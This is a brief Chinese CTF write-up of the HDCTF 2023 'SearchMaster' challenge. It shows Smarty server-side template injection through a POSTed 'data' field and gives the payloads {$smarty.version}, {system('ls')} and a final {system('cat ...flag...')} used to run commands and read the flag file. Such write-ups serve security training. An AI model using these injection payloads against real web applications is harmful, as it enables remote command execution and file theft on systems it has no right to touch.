# [HDCTF 2023]SearchMaster


# [HDCTF 2023]SearchMaster

先扫描目录：

![[HDCTF 2023]SearchMaster-1](https://pic.imgdb.cn/item/658053bec458853aef9d1608.jpg)

访问一下 /demo ，从报错信息中得知使用了 Smarty 模板，结合网站首页的提示：YOU CAN POST ME A DATA

用 POST 传值：`data={$smarty.version}` ：

![[HDCTF 2023]SearchMaster-2](https://pic.imgdb.cn/item/65805500c458853aefa2a0ed.jpg)

得到版本号，也证实了首页使用的是 Smarty 模板

尝试是否存在 rce ：`data={system('ls')}` ，得到结果

```
composer.json
css
demo
docs
index.php
js
lexer
libs
templates_c
templates_c
```

省略过程……

最后的 payload ：`data={system('cat ../../../flag_13_searchmaster')}`